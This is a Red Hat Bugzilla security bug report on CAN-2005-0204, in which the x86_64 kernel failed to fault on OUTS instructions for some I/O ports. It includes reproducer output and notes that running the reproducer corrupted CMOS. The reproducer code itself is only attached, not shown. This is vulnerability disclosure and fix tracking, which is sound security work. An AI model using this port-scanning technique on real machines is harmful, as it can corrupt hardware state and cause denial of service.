Bug 148855 - CAN-2005-0204 OUTS instruction does not cause SIGSEGV for all ports
CAN-2005-0204 OUTS instruction does not cause SIGSEGV for all ports
Status: CLOSED ERRATA
Product: Red Hat Enterprise Linux 3
Classification: Red Hat
Component: kernel (Show other bugs)
3.0
x86_64 Linux
medium Severity high
: ---
: ---
Assigned To: Ernie Petrides
Brian Brock
public=20050126,impact=important
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2005-02-16 07:34 EST by Mark J. Cox (Product Security)
Modified: 2007-11-30 17:07 EST (History)
5 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2005-04-22 16:17:35 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)
RHEL3 x86_64 reproducer (799 bytes, text/plain)
2005-04-08 20:46 EDT, Ernie Petrides
no flags Details

  None (edit)
Description Mark J. Cox (Product Security) 2005-02-16 07:34:31 EST
Verified as affecting RHEL3 (also can result in DoS)

*** This bug has been split off bug 146244 ***

------- Original comment by Staffan Larsen on 2005.01.26 08:28 -------

From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0

Description of problem:
Compile the attached program on x86

Run on x86 - it should not print anything. This behaviour is correct.

Run (the same binary) on x86_64 - it prints out a number of port
values for which the OUTS instruction did not cause a SIGSEGV. This
behaviour is not correct.

Version-Release number of selected component (if applicable):
Linux version 2.6.9-1.906_ELsmp (bhcompile@dolly.build.redhat.com)
(gcc version 3.4.3 20041125 (Red Hat 3.4.3-6.EL4)) #1 SMP Sun Dec 12
23:05:02 EST 2004

How reproducible:
Always

Steps to Reproduce:
1. Compile program on x86

A. 
2. Run on x86

B.
2. Run on x86_64


    

Actual Results:  A.
<nothing>

B.
didn't get signal for port=440
didn't get signal for port=441
didn't get signal for port=442
didn't get signal for port=443
didn't get signal for port=444
didn't get signal for port=445
didn't get signal for port=446
didn't get signal for port=447
didn't get signal for port=448
didn't get signal for port=449
didn't get signal for port=44a
didn't get signal for port=44b
didn't get signal for port=44c
didn't get signal for port=44d
didn't get signal for port=44e
didn't get signal for port=44f
didn't get signal for port=450
didn't get signal for port=451
didn't get signal for port=452
didn't get signal for port=453
didn't get signal for port=454
didn't get signal for port=455
didn't get signal for port=456
didn't get signal for port=457
didn't get signal for port=458
didn't get signal for port=459
didn't get signal for port=45a
didn't get signal for port=45b
didn't get signal for port=45c
didn't get signal for port=45d
didn't get signal for port=45e
didn't get signal for port=45f
didn't get signal for port=460
didn't get signal for port=461
didn't get signal for port=462
didn't get signal for port=463
didn't get signal for port=464
didn't get signal for port=465
didn't get signal for port=466
didn't get signal for port=467
didn't get signal for port=468
didn't get signal for port=469
didn't get signal for port=46a
didn't get signal for port=46b
didn't get signal for port=46c
didn't get signal for port=46d
didn't get signal for port=46e
didn't get signal for port=46f
didn't get signal for port=470
didn't get signal for port=471
didn't get signal for port=472
didn't get signal for port=473
didn't get signal for port=474
didn't get signal for port=475
didn't get signal for port=476
didn't get signal for port=477
didn't get signal for port=478
didn't get signal for port=479
didn't get signal for port=47a
didn't get signal for port=47b
didn't get signal for port=47c
didn't get signal for port=47d
didn't get signal for port=47e
didn't get signal for port=47f
didn't get signal for port=480
didn't get signal for port=481
didn't get signal for port=482
didn't get signal for port=483
didn't get signal for port=484
didn't get signal for port=485
didn't get signal for port=486
didn't get signal for port=487
didn't get signal for port=488
didn't get signal for port=489
didn't get signal for port=48a
didn't get signal for port=48b
didn't get signal for port=48c
didn't get signal for port=48d
didn't get signal for port=48e
didn't get signal for port=48f
didn't get signal for port=490
didn't get signal for port=491
didn't get signal for port=492
didn't get signal for port=493
didn't get signal for port=494
didn't get signal for port=495
didn't get signal for port=496
didn't get signal for port=497
didn't get signal for port=498
didn't get signal for port=499
didn't get signal for port=49a
didn't get signal for port=49b
didn't get signal for port=49c
didn't get signal for port=49d
didn't get signal for port=49e
didn't get signal for port=49f
didn't get signal for port=4a0
didn't get signal for port=4a1
didn't get signal for port=4a2
didn't get signal for port=4a3
didn't get signal for port=4a4
didn't get signal for port=4a5
didn't get signal for port=4a6
didn't get signal for port=4a7
didn't get signal for port=4a8
didn't get signal for port=4a9
didn't get signal for port=4aa
didn't get signal for port=4ab
didn't get signal for port=4ac
didn't get signal for port=4ad
didn't get signal for port=4ae
didn't get signal for port=4af
didn't get signal for port=4b0
didn't get signal for port=4b1
didn't get signal for port=4b2
didn't get signal for port=4b3
didn't get signal for port=4b4
didn't get signal for port=4b5
didn't get signal for port=4b6
didn't get signal for port=4b7


Expected Results:  A.
<nothing>

B.
<nothing>

Additional info:
Comment 1 Mark J. Cox (Product Security) 2005-02-16 09:53:13 EST
*** Important Note ** Running the program above without modifications
allowed me as a normal user to mess up the CMOS on a dual Opteron box
Comment 2 Mark J. Cox (Product Security) 2005-02-23 07:46:27 EST
ping
Comment 3 Ernie Petrides 2005-03-08 14:59:05 EST
Mark, just for clarification, does your comment #1 reflect the results of
runnning the reproducer on a RHEL3-based system?

(I don't believe the results in the initial comment are relevant to RHEL3.)
Comment 4 Jim Paradis 2005-03-08 15:04:42 EST
I'm trying this out on RHEL3 right now...
Comment 5 Jim Paradis 2005-03-08 15:43:57 EST
Ernie suggested that different sizes of the IO bitmaps between RHEL3 and RHEL4
might make this not a problem on RHEL3.  I tried the reproducer and verified
that on RHEL3 it generates SEGVs for all the OUTs.  Closing this as NOTABUG.
Comment 6 Mark J. Cox (Product Security) 2005-03-08 18:56:28 EST
At home I have a RHEL3 SMP x86_64 box using a standard kernel that was
vulnerable to this exploit.  I'm away so I don't have access to this today, so I
can't tell you if it was a completely up2date kernel.  
Comment 7 Mark J. Cox (Product Security) 2005-03-16 08:10:18 EST
(with altered program to just poll port 100)

[mark@pindrop mark]$ uname -a
Linux pindrop 2.4.21-20.ELsmp #1 SMP Wed Aug 18 20:34:58 EDT 2004 x86_64 x86_64
x86_64 GNU/Linux
[mark@pindrop mark]$ ./a.out
didn't get signal for port=64
Comment 8 Ernie Petrides 2005-04-08 19:36:14 EDT
The reproducer in comment #1 of bug 146244 does not "work" on RHEL3
because access to the i/o port map is not enabled by default (as it
is in 2.6).  Thus, whatever problem Mark induced on RHEL3 must be
unrelated to this vulnerability.

I do believe that RHEL3 does have a problem on x86_64 if the i/o port
map does get enabled.  I will try to develop a revised reproducer.
Comment 9 Ernie Petrides 2005-04-08 20:46:54 EDT
Created attachment 112894 [details]
RHEL3 x86_64 reproducer

Here is a working RHEL3 reproducer.  It requires root privileges in order
to invoke a "ioperm(0L, 1L, 1);" system call, and the scanning loop needed
to be changed to start from port 1 (to avoid corrupting the port 0 enabled
by the ioperm() call).
Comment 10 Ernie Petrides 2005-04-08 21:34:03 EDT
Patch posted for review on 8-Apr-2005.
Comment 11 Ernie Petrides 2005-04-13 20:25:46 EDT
A fix for this problem has just been committed to the RHEL3 E5
patch pool this evening (in kernel version 2.4.21-27.0.3.EL).
Comment 12 Ernie Petrides 2005-04-15 21:28:15 EDT
A fix for this problem has also been committed to the RHEL3 U5
patch pool this evening (in kernel version 2.4.21-32.EL).
Comment 13 Josh Bressers 2005-04-22 16:17:35 EDT
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2005-293.html
Comment 14 Tim Powers 2005-05-18 09:29:18 EDT
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2005-294.html

Note You need to log in before you can comment on or make changes to this bug.